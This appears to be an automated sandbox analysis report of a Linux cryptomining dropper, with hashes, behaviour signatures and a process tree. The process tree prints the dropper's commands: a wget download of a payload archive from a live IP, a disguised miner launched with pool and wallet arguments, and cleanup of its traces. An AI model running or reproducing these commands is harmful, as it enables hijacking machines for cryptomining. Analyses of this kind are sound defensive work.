c6cf1908f96405fd4cca559c8ae9bcdb12d5919bcbd510d1bbe8d1135779dfba

Analysis

max time kernel
119s
max time network
107s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
17-01-2025 00:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c6cf1908f96405fd4cca559c8ae9bcdb12d5919bcbd510d1bbe8d1135779dfbaN
Size

6KB
MD5

eae738a54a07452e9aa656c690512980
SHA1

0051ca1fa59d4c857364b541f5cc9b4d483f15bf
SHA256

c6cf1908f96405fd4cca559c8ae9bcdb12d5919bcbd510d1bbe8d1135779dfba
SHA512

ad972376828b5a2c928c12069a17cd35ce8243521691da65eb9435e5a26b8883d4a6c53711869e7b81ef077dde28f887ace7dfbb3634bd960bc7b53ff5749f80
SSDEEP

192:o+yjg4p9ehSerXOKDj7V9NoB8lvjW9cPHRzUlx:xflLAKHIx

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 1 IoCs

ioc	pid	Process
/usr/lib/dev/systemdev/systemd-mont	1531	systemd-mont

Enumerates running processes
Discovers information about currently running processes on the system

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ifconfig.me
3	ifconfig.me

Reads CPU attributes 1 TTPs 2 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	systemd-mont
File opened for reading	/sys/devices/system/cpu/online	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/3/stat	ps
File opened for reading	/proc/20/status	ps
File opened for reading	/proc/468/stat	ps
File opened for reading	/proc/1092/status	ps
File opened for reading	/proc/1161/stat	ps
File opened for reading	/proc/1172/status	ps
File opened for reading	/proc/1174/stat	ps
File opened for reading	/proc/1326/stat	ps
File opened for reading	/proc/164/status	ps
File opened for reading	/proc/441/status	ps
File opened for reading	/proc/644/stat	ps
File opened for reading	/proc/1064/status	ps
File opened for reading	/proc/1141/status	ps
File opened for reading	/proc/1499/status	ps
File opened for reading	/proc/32/status	ps
File opened for reading	/proc/98/stat	ps
File opened for reading	/proc/1312/status	ps
File opened for reading	/proc/1384/stat	ps
File opened for reading	/proc/1497/stat	ps
File opened for reading	/proc/2/stat	ps
File opened for reading	/proc/2/status	ps
File opened for reading	/proc/14/stat	ps
File opened for reading	/proc/79/status	ps
File opened for reading	/proc/1080/stat	ps
File opened for reading	/proc/1189/status	ps
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/10/stat	ps
File opened for reading	/proc/36/stat	ps
File opened for reading	/proc/688/stat	ps
File opened for reading	/proc/1146/status	ps
File opened for reading	/proc/1302/status	ps
File opened for reading	/proc/1480/status	ps
File opened for reading	/proc/9/stat	ps
File opened for reading	/proc/79/stat	ps
File opened for reading	/proc/260/status	ps
File opened for reading	/proc/468/status	ps
File opened for reading	/proc/559/status	ps
File opened for reading	/proc/1074/status	ps
File opened for reading	/proc/1088/stat	ps
File opened for reading	/proc/1146/stat	ps
File opened for reading	/proc/30/stat	ps
File opened for reading	/proc/80/status	ps
File opened for reading	/proc/173/status	ps
File opened for reading	/proc/175/stat	ps
File opened for reading	/proc/1523/status	ps
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/self/stat	ps
File opened for reading	/proc/26/status	ps
File opened for reading	/proc/555/status	ps
File opened for reading	/proc/661/status	ps
File opened for reading	/proc/1343/stat	ps
File opened for reading	/proc/1151/status	ps
File opened for reading	/proc/1349/status	ps
File opened for reading	/proc/5/stat	ps
File opened for reading	/proc/176/status	ps
File opened for reading	/proc/457/stat	ps
File opened for reading	/proc/7/status	ps
File opened for reading	/proc/35/stat	ps
File opened for reading	/proc/277/status	ps
File opened for reading	/proc/609/stat	ps
File opened for reading	/proc/1137/stat	ps
File opened for reading	/proc/1495/status	ps
File opened for reading	/proc/24/status	ps
File opened for reading	/proc/34/status	ps

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1506	wget

Writes file to tmp directory 2 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/2d.bin	systemd-mont
File opened for modification	/tmp/3d.bin	systemd-mont

/tmp/c6cf1908f96405fd4cca559c8ae9bcdb12d5919bcbd510d1bbe8d1135779dfbaN
/tmp/c6cf1908f96405fd4cca559c8ae9bcdb12d5919bcbd510d1bbe8d1135779dfbaN
1⤵
PID:1501
- /bin/rm
  rm -f /tmp/usr/lib/systemdev/systemd-mont
  2⤵
  PID:1502
- /bin/rm
  rm -f /usr/lib/systemdev/systemd-mon
  2⤵
  PID:1503
- /bin/rm
  rm -f /usr/lib/dev/systemdev/systemd-mont
  2⤵
  PID:1504
- /bin/systemctl
  systemctl stop systemd_s
  2⤵
  - Reads runtime system information
  PID:1505
- /usr/bin/wget
  wget -qO- ifconfig.me
  2⤵
  - System Network Configuration Discovery
  PID:1506
- /bin/sed
  sed "s/\\./-/g"
  2⤵
  PID:1514
- /usr/bin/cut
  cut -c -10
  2⤵
  PID:1518
- /usr/bin/id
  id -u
  2⤵
  PID:1519
- /usr/bin/id
  id -u
  2⤵
  PID:1520
- /bin/mkdir
  mkdir -p /usr/lib/dev/systemdev
  2⤵
  PID:1521
- /usr/bin/wget
  wget -qO /usr/lib/dev/systemdev/yes.tar.gz http://151.106.34.115:6573/yes.tar.gz
  2⤵
  PID:1522
- /bin/tar
  tar -xzf /usr/lib/dev/systemdev/yes.tar.gz -C /usr/lib/dev/systemdev
  2⤵
  PID:1527
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:1528
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:1528
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:1528
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:1528
- - /sbin/gzip
    gzip -d
    3⤵
    PID:1528
- - /bin/gzip
    gzip -d
    3⤵
    PID:1528
- /bin/mv
  2⤵
  PID:1529
- /bin/rm
  2⤵
  PID:1530
- /bin/sleep
  sleep 5
  2⤵
  PID:1532
- /usr/bin/nice
  nice -n -20 /usr/lib/dev/systemdev/systemd-mont --daemon-address spr.tw-pool.com --port 14001 --spectre --wallet spectre:qz84qx270dh2u73e3p9m528lr3xhykspmatyc4pcsjlf50756d8m6vht6z5nl.
  2⤵
  PID:1531
- /usr/lib/dev/systemdev/systemd-mont
  /usr/lib/dev/systemdev/systemd-mont --daemon-address spr.tw-pool.com --port 14001 --spectre --wallet spectre:qz84qx270dh2u73e3p9m528lr3xhykspmatyc4pcsjlf50756d8m6vht6z5nl.
  2⤵
  - Executes dropped EXE
  - Reads CPU attributes
  - Writes file to tmp directory
  PID:1531
- /bin/ps
  ps -p 1531
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1535
- /bin/rm
  rm -f /tmp/mon.sh
  2⤵
  PID:1537
- /bin/rm
  rm -f /tmp/run.sh
  2⤵
  PID:1538

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/2d.bin

Filesize
64KB

MD5
05886f5b7378848476969b587db33334

SHA1
5a4bd1e1466eabebd21187065aee25c26e956f6e

SHA256
58c82d769f4d510ab21a6271ec3d05fc474c22a9165960fcdaae14549cba6afb

SHA512
59ed0b860ca9b58840a1a0bd6c64554bf1bbad894e6fbb4e5f1ca748929ea6c5978826d0e102df779d7f2460f1538eb190581b0928da182bebea7ef5157a5e3d

Download Submit
/tmp/3d.bin

Filesize
64KB

MD5
112cf3ecd24f8cd5f705633bf2350050

SHA1
e42dc706de1cffb50f0b6fa9a7bf8155ad51dc02

SHA256
91344ecf02e95cdb12137c24924c47b4e312f67974adba1aa4c7a9a17d37e2cb

SHA512
e28772bba7b93ff10e56e2f727c2c634ddf9c15424bb030ca5990aa48bccf1a99b99ba1522067765b92ed85871a10360b021b240a56586e7a97c5c964cb636b3

Download Submit
/usr/lib/dev/systemdev/cpuminer-sse2

Filesize
15.5MB

MD5
1bba36b6469f0d1247dda40afb6c8429

SHA1
a91ef7c246cc1262694e61ed8e73f6165e6a9e3c

SHA256
b2592e1c95f841b0ab0b51e1da340ef52ce1b4e1c55f1f60d326645b6157e9f2

SHA512
b2f3f9ce59a97297b23a1c064769b68a19e8a48f1492ca65e95e4a2edd305e2c7f931ab1e0cb6df98c13f82260e64c414009f4ef67c26f65aea9cd464a108d2c

Download Submit
/usr/lib/dev/systemdev/yes.tar.gz

Filesize
4.8MB

MD5
35b2a7a1b428134bba223f2152bec468

SHA1
6a4d34eb3d4a01d549e2f4a41395af778c5851ed

SHA256
6305719138ee437f889b3a10100d13d8ccbc862d84aac7b27bf24a5ef5aa1d35

SHA512
a8a690767d7f97a4d52639a4bc073789e24b7b9219c0a374f7edaa488583dc2f429b9fd4187d497bf4314703377a58e1ebb19778ee011efc32399578dba7dea0

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads